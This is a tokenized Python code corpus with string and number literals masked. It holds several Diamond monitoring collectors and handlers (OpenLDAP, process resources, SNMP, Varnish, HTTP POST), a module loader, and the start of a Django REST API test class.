<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> try : <EOL> import ldap <EOL> except ImportError : <EOL> ldap = None <EOL> class OpenLDAPCollector ( diamond . collector . Collector ) : <EOL> STATS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' 
: '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( OpenLDAPCollector , self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT:port>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( OpenLDAPCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' , <EOL> } ) <EOL> return config <EOL> def get_datapoints ( self , ldap_url , username , password ) : <EOL> datapoints = { } <EOL> conn = ldap . initialize ( ldap_url ) <EOL> conn . start_tls_s ( ) <EOL> conn . simple_bind_s ( username , password ) <EOL> try : <EOL> for key in self . STATS . keys ( ) : <EOL> base = self . STATS [ key ] [ '<STR_LIT>' ] <EOL> attr = self . STATS [ key ] [ '<STR_LIT>' ] <EOL> num = conn . search ( base , ldap . SCOPE_BASE , <EOL> '<STR_LIT>' , [ attr ] ) <EOL> result_type , result_data = conn . 
result ( num , <NUM_LIT:0> ) <EOL> datapoints [ key ] = int ( result_data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ attr ] [ <NUM_LIT:0> ] ) <EOL> except : <EOL> self . log . warn ( '<STR_LIT>' <EOL> % ( base , attr ) ) <EOL> raise <EOL> return datapoints <EOL> def collect ( self ) : <EOL> if ldap is None : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> return { } <EOL> ldap_url = '<STR_LIT>' % ( self . config [ '<STR_LIT:host>' ] , <EOL> int ( self . config [ '<STR_LIT:port>' ] ) ) <EOL> try : <EOL> datapoints = self . get_datapoints ( ldap_url , <EOL> self . config [ '<STR_LIT:username>' ] , <EOL> self . config [ '<STR_LIT:password>' ] ) <EOL> except Exception , e : <EOL> self . log . error ( '<STR_LIT>' % ( ldap_url , e ) ) <EOL> return { } <EOL> for name , value in datapoints . items ( ) : <EOL> self . publish ( name , value ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import time <EOL> import diamond . collector <EOL> import diamond . convertor <EOL> try : <EOL> import psutil <EOL> psutil <EOL> except ImportError : <EOL> psutil = None <EOL> def match_process ( pid , name , cmdline , exe , cfg ) : <EOL> """<STR_LIT>""" <EOL> if cfg [ '<STR_LIT>' ] and pid == os . getpid ( ) : <EOL> return True <EOL> for exe_re in cfg [ '<STR_LIT>' ] : <EOL> if exe_re . search ( exe ) : <EOL> return True <EOL> for name_re in cfg [ '<STR_LIT:name>' ] : <EOL> if name_re . search ( name ) : <EOL> return True <EOL> for cmdline_re in cfg [ '<STR_LIT>' ] : <EOL> if cmdline_re . search ( '<STR_LIT:U+0020>' . join ( cmdline ) ) : <EOL> return True <EOL> return False <EOL> def process_info ( process , info_keys ) : <EOL> results = { } <EOL> process_info = process . as_dict ( ) <EOL> metrics = ( ( key , process_info . get ( key , None ) ) for key in info_keys ) <EOL> for key , value in metrics : <EOL> if type ( value ) in [ float , int ] : <EOL> results . update ( { key : value } ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> for subkey , subvalue in value . _asdict ( ) . iteritems ( ) : <EOL> results . update ( { "<STR_LIT>" % ( key , subkey ) : subvalue } ) <EOL> return results <EOL> def get_value ( process , name ) : <EOL> result = getattr ( process , name ) <EOL> try : <EOL> return result ( ) <EOL> except TypeError : <EOL> return result <EOL> class ProcessResourcesCollector ( diamond . collector . Collector ) : <EOL> def process_config ( self ) : <EOL> super ( ProcessResourcesCollector , self ) . process_config ( ) <EOL> """<STR_LIT>""" <EOL> self . processes = { } <EOL> self . processes_info = { } <EOL> for pg_name , cfg in self . config [ '<STR_LIT>' ] . items ( ) : <EOL> pg_cfg = { } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) : <EOL> pg_cfg [ key ] = cfg . 
get ( key , [ ] ) <EOL> if not isinstance ( pg_cfg [ key ] , list ) : <EOL> pg_cfg [ key ] = [ pg_cfg [ key ] ] <EOL> pg_cfg [ key ] = [ re . compile ( e ) for e in pg_cfg [ key ] ] <EOL> pg_cfg [ '<STR_LIT>' ] = cfg . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) == '<STR_LIT:true>' <EOL> pg_cfg [ '<STR_LIT>' ] = cfg . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) == '<STR_LIT:true>' <EOL> self . processes [ pg_name ] = pg_cfg <EOL> self . processes_info [ pg_name ] = { } <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( ProcessResourcesCollector , <EOL> self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( ProcessResourcesCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:B>' , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> return config <EOL> default_info_keys = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def save_process_info ( self , pg_name , process_info ) : <EOL> for key , value in process_info . iteritems ( ) : <EOL> if key in self . processes_info [ pg_name ] : <EOL> self . processes_info [ pg_name ] [ key ] += value <EOL> else : <EOL> self . processes_info [ pg_name ] [ key ] = value <EOL> def collect_process_info ( self , process ) : <EOL> try : <EOL> pid = get_value ( process , '<STR_LIT>' ) <EOL> name = get_value ( process , '<STR_LIT:name>' ) <EOL> cmdline = get_value ( process , '<STR_LIT>' ) <EOL> try : <EOL> exe = get_value ( process , '<STR_LIT>' ) <EOL> except psutil . AccessDenied : <EOL> exe = "<STR_LIT>" <EOL> for pg_name , cfg in self . processes . 
items ( ) : <EOL> if match_process ( pid , name , cmdline , exe , cfg ) : <EOL> pi = process_info ( process , self . default_info_keys ) <EOL> if cfg [ '<STR_LIT>' ] : <EOL> pi . update ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> uptime = time . time ( ) - getattr ( process , '<STR_LIT>' ) <EOL> pi . update ( { '<STR_LIT>' : uptime } ) <EOL> self . save_process_info ( pg_name , pi ) <EOL> except psutil . NoSuchProcess , e : <EOL> self . log . info ( "<STR_LIT>" , e ) <EOL> def collect ( self ) : <EOL> """<STR_LIT>""" <EOL> if not psutil : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> self . log . error ( '<STR_LIT>' ) <EOL> return None <EOL> for process in psutil . process_iter ( ) : <EOL> self . collect_process_info ( process ) <EOL> for pg_name , counters in self . processes_info . iteritems ( ) : <EOL> metrics = ( <EOL> ( "<STR_LIT>" % ( pg_name , key ) , value ) <EOL> for key , value in counters . iteritems ( ) ) <EOL> [ self . publish ( * metric ) for metric in metrics ] <EOL> self . processes_info [ pg_name ] = { } </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import time <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( os . path . dirname ( __file__ ) ) , <EOL> '<STR_LIT>' ) ) <EOL> from snmp import SNMPCollector as parent_SNMPCollector <EOL> from diamond . metric import Metric <EOL> class SNMPRawCollector ( parent_SNMPCollector ) : <EOL> def process_config ( self ) : <EOL> super ( SNMPRawCollector , self ) . process_config ( ) <EOL> self . skip_list = [ ] <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> default_config = super ( SNMPRawCollector , <EOL> self ) . get_default_config ( ) <EOL> default_config . update ( { <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return default_config <EOL> def _precision ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = str ( value ) <EOL> decimal = value . rfind ( '<STR_LIT:.>' ) <EOL> if decimal == - <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> return len ( value ) - decimal - <NUM_LIT:1> <EOL> def _skip ( self , device , oid , reason = None ) : <EOL> self . skip_list . append ( ( device , oid ) ) <EOL> if reason is not None : <EOL> self . log . warn ( '<STR_LIT>' . format ( <EOL> oid , device , reason ) ) <EOL> def _get_value_walk ( self , device , oid , host , port , community ) : <EOL> data = self . walk ( oid , host , port , community ) <EOL> if data is None : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> self . log . debug ( '<STR_LIT>' . format ( <EOL> device , data ) ) <EOL> if len ( data ) != <NUM_LIT:1> : <EOL> self . _skip ( <EOL> device , <EOL> oid , <EOL> '<STR_LIT>' . format ( <EOL> len ( data ) ) ) <EOL> return <EOL> value = data . items ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> return value <EOL> def _get_value ( self , device , oid , host , port , community ) : <EOL> data = self . get ( oid , host , port , community ) <EOL> if data is None : <EOL> self . 
_skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> self . log . debug ( '<STR_LIT>' . format ( <EOL> device , data ) ) <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> if oid not in data : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> value = data [ oid ] <EOL> if value == '<STR_LIT>' : <EOL> self . _skip ( device , oid , '<STR_LIT>' ) <EOL> return <EOL> if value == '<STR_LIT>' : <EOL> return self . _get_value_walk ( device , oid , host , port , community ) <EOL> return value <EOL> def collect_snmp ( self , device , host , port , community ) : <EOL> """<STR_LIT>""" <EOL> self . log . debug ( <EOL> '<STR_LIT>' . format ( device ) ) <EOL> dev_config = self . config [ '<STR_LIT>' ] [ device ] <EOL> if '<STR_LIT>' in dev_config : <EOL> for oid , metricName in dev_config [ '<STR_LIT>' ] . items ( ) : <EOL> if ( device , oid ) in self . skip_list : <EOL> self . log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> oid , metricName , device ) ) <EOL> continue <EOL> timestamp = time . time ( ) <EOL> value = self . _get_value ( device , oid , host , port , community ) <EOL> if value is None : <EOL> continue <EOL> self . log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> oid , metricName , device , value ) ) <EOL> path = '<STR_LIT:.>' . join ( [ self . config [ '<STR_LIT>' ] , device , <EOL> self . config [ '<STR_LIT>' ] , metricName ] ) <EOL> metric = Metric ( path = path , value = value , timestamp = timestamp , <EOL> precision = self . _precision ( value ) , <EOL> metric_type = '<STR_LIT>' ) <EOL> self . publish_metric ( metric ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from varnish import VarnishCollector <EOL> class TestVarnishCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { } ) <EOL> self . collector = VarnishCollector ( config , None ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( VarnishCollector ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> collector_mock = patch . object ( VarnishCollector , '<STR_LIT>' , Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> collector_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> collector_mock . stop ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : 
<NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . 
__name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_fail_gracefully ( self , publish_mock ) : <EOL> collector_mock = patch . object ( VarnishCollector , '<STR_LIT>' , Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) . getvalue ( ) ) ) <EOL> collector_mock . start ( ) <EOL> self . collector . collect ( ) <EOL> collector_mock . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from Handler import Handler <EOL> import urllib2 <EOL> class HttpPostHandler ( Handler ) : <EOL> def __init__ ( self , config = None ) : <EOL> Handler . __init__ ( self , config ) <EOL> self . metrics = [ ] <EOL> self . batch_size = int ( self . config [ '<STR_LIT>' ] ) <EOL> self . url = self . config . get ( '<STR_LIT:url>' ) <EOL> def get_default_config_help ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( HttpPostHandler , self ) . get_default_config_help ( ) <EOL> config . update ( { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( HttpPostHandler , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } ) <EOL> return config <EOL> def process ( self , metric ) : <EOL> self . metrics . append ( str ( metric ) ) <EOL> if len ( self . metrics ) >= self . batch_size : <EOL> self . post ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> self . post ( ) <EOL> def post ( self ) : <EOL> req = urllib2 . Request ( self . url , "<STR_LIT:\n>" . join ( self . metrics ) ) <EOL> urllib2 . urlopen ( req ) <EOL> self . metrics = [ ] </s>
<s> import configobj <EOL> import os <EOL> import sys <EOL> import logging <EOL> import inspect <EOL> import traceback <EOL> from diamond . util import load_class_from_name <EOL> from diamond . collector import Collector <EOL> from diamond . handler . Handler import Handler <EOL> def load_include_path ( paths ) : <EOL> """<STR_LIT>""" <EOL> for path in paths : <EOL> if not os . path . isdir ( path ) : <EOL> continue <EOL> if path not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:1> , path ) <EOL> for f in os . listdir ( path ) : <EOL> fpath = os . path . join ( path , f ) <EOL> if os . path . isdir ( fpath ) : <EOL> load_include_path ( [ fpath ] ) <EOL> def load_dynamic_class ( fqn , subclass ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( fqn , basestring ) : <EOL> return fqn <EOL> cls = load_class_from_name ( fqn ) <EOL> if cls == subclass or not issubclass ( cls , subclass ) : <EOL> raise TypeError ( "<STR_LIT>" % ( fqn , subclass . __name__ ) ) <EOL> return cls <EOL> def load_handlers ( config , handler_names ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> handlers = [ ] <EOL> if isinstance ( handler_names , basestring ) : <EOL> handler_names = [ handler_names ] <EOL> for handler in handler_names : <EOL> log . debug ( '<STR_LIT>' , handler ) <EOL> try : <EOL> cls = load_dynamic_class ( handler , Handler ) <EOL> cls_name = cls . __name__ <EOL> handler_config = configobj . ConfigObj ( ) <EOL> handler_config . merge ( config [ '<STR_LIT>' ] [ '<STR_LIT:default>' ] ) <EOL> if cls_name in config [ '<STR_LIT>' ] : <EOL> handler_config . merge ( config [ '<STR_LIT>' ] [ cls_name ] ) <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] : <EOL> configfile = os . path . join ( <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> cls_name ) + '<STR_LIT>' <EOL> if os . path . exists ( configfile ) : <EOL> handler_config . merge ( configobj . ConfigObj ( configfile ) ) <EOL> h = cls ( handler_config ) <EOL> handlers . 
append ( h ) <EOL> except ( ImportError , SyntaxError ) : <EOL> log . warning ( "<STR_LIT>" , <EOL> handler , <EOL> traceback . format_exc ( ) ) <EOL> continue <EOL> return handlers <EOL> def load_collectors ( paths = None , filter = None ) : <EOL> """<STR_LIT>""" <EOL> collectors = { } <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> if paths is None : <EOL> return <EOL> if isinstance ( paths , basestring ) : <EOL> paths = paths . split ( '<STR_LIT:U+002C>' ) <EOL> paths = map ( str . strip , paths ) <EOL> load_include_path ( paths ) <EOL> for path in paths : <EOL> if not os . path . exists ( path ) : <EOL> raise OSError ( "<STR_LIT>" % path ) <EOL> if path . endswith ( '<STR_LIT>' ) or path . endswith ( '<STR_LIT>' ) : <EOL> return collectors <EOL> for f in os . listdir ( path ) : <EOL> fpath = os . path . join ( path , f ) <EOL> if os . path . isdir ( fpath ) : <EOL> subcollectors = load_collectors ( [ fpath ] ) <EOL> for key in subcollectors : <EOL> collectors [ key ] = subcollectors [ key ] <EOL> elif ( os . path . isfile ( fpath ) <EOL> and len ( f ) > <NUM_LIT:3> <EOL> and f [ - <NUM_LIT:3> : ] == '<STR_LIT>' <EOL> and f [ <NUM_LIT:0> : <NUM_LIT:4> ] != '<STR_LIT:test>' <EOL> and f [ <NUM_LIT:0> ] != '<STR_LIT:.>' ) : <EOL> if filter and os . path . join ( path , f ) != filter : <EOL> continue <EOL> modname = f [ : - <NUM_LIT:3> ] <EOL> try : <EOL> mod = __import__ ( modname , globals ( ) , locals ( ) , [ '<STR_LIT:*>' ] ) <EOL> except ( KeyboardInterrupt , SystemExit ) as err : <EOL> log . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % modname ) <EOL> if isinstance ( err , SystemExit ) : <EOL> sys . exit ( err . code ) <EOL> raise KeyboardInterrupt <EOL> except : <EOL> log . error ( "<STR_LIT>" , <EOL> modname , <EOL> traceback . format_exc ( ) ) <EOL> continue <EOL> for attrname in dir ( mod ) : <EOL> attr = getattr ( mod , attrname ) <EOL> if ( inspect . 
isclass ( attr ) <EOL> and issubclass ( attr , Collector ) <EOL> and attr != Collector ) : <EOL> if attrname . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> fqcn = '<STR_LIT:.>' . join ( [ modname , attrname ] ) <EOL> try : <EOL> cls = load_dynamic_class ( fqcn , Collector ) <EOL> collectors [ cls . __name__ ] = cls <EOL> except Exception : <EOL> log . error ( <EOL> "<STR_LIT>" , <EOL> fqcn , traceback . format_exc ( ) ) <EOL> continue <EOL> return collectors <EOL> def initialize_collector ( cls , name = None , configfile = None , handlers = [ ] ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> collector = None <EOL> try : <EOL> collector = cls ( name = name , configfile = configfile , handlers = handlers ) <EOL> except Exception : <EOL> log . error ( "<STR_LIT>" , <EOL> cls . __name__ , traceback . format_exc ( ) ) <EOL> return collector </s>
<s> from rest_framework . test import APITestCase <EOL> from django . core . management import call_command <EOL> from django . core . management . base import CommandError <EOL> class BaseTestCase ( APITestCase ) : <EOL> def init_data ( self ) : <EOL> self . url = '<STR_LIT>' <EOL> self . good_url = '<STR_LIT>' <EOL> self . good_data = { "<STR_LIT:title>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:test>" , "<STR_LIT:content>" : "<STR_LIT:test>" } <EOL> self . bad_url = '<STR_LIT>' <EOL> self . bad_data = { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : "<STR_LIT:test>" , "<STR_LIT:content>" : "<STR_LIT>" } <EOL> def generate_api ( self , format ) : <EOL> args = [ '<STR_LIT>' ] <EOL> opts = { '<STR_LIT>' : format , '<STR_LIT>' : True } <EOL> call_command ( '<STR_LIT>' , * args , ** opts ) <EOL> self . init_data ( ) <EOL> def set_up ( self ) : <EOL> response = self . client . post ( self . url , self . good_data , format = '<STR_LIT>' ) <EOL> return ( response , self . good_data ) <EOL> def create_post ( self ) : <EOL> response , data = self . set_up ( ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( response . data [ "<STR_LIT:title>" ] , data [ "<STR_LIT:title>" ] ) <EOL> self . assertEqual ( response . data [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( response . data [ "<STR_LIT:content>" ] , data [ "<STR_LIT:content>" ] ) <EOL> def create_post_error ( self ) : <EOL> response = self . client . post ( self . url , self . bad_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def list_post ( self ) : <EOL> self . set_up ( ) <EOL> response = self . client . get ( self . url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def retrieve_post ( self ) : <EOL> self . set_up ( ) 